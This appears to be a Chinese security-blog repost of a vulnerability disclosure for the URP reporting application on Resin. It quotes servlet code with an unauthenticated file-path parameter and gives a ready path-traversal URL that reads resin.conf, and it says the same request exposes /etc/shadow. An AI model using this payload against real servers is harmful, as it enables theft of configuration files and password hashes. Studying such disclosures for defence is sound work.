跟第一发一样,上次那个有大牛提前发了,我来个新鲜的吧,一样的影响,数据量同上,1.38 1.5通杀。先来代码。补充下路径这个应用一般路径是/usr/local/resin-3.0.27/webapps/xfzzhjw/

 

public void service(HttpServletRequest req, HttpServletResponse res)
{
ServletOutputStream out;
InputStream is;
out = null;
is = null;
String graphId = req.getParameter("graphId");
byte b[] = null;
if (graphId != null)
{
b = GraphPool.get(graphId);
GraphPool.remove(graphId);
} else
{
String picFile = req.getParameter("picFile"); //一样的位置
is = getClass().getResourceAsStream(picFile);
b = ControlUtils.getStreamBytes(is);
}
res.setContentType("image/jpeg");
out = res.getOutputStream();
out.write(b);
out.flush();
Exception e;

一样的问题这个,不用登陆。

根据问题代码,构造一下http://x.x.x.x/servlet/com.runqian.report.view.html.GraphServlet?picFile=../../../../../../../../conf/resin.conf

唰华丽丽的全都泄露了。
 

URP通杀第二弹(短小精悍的小题目) – 网站安全插图

同样的可以查看shadow
 

URP通杀第二弹(短小精悍的小题目) – 网站安全插图1

 

修复方案:

同第一个亲,cncert有可能的话求个证书~

    上一篇: fengcms SQL注射一枚 - 网站安全 - 自学php

    下一篇: 178游戏网某站order by注入 - 网站安全 - 自学php
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《URP通杀第二弹(短小精悍的小题目) – 网站安全
   

还没有人抢沙发呢~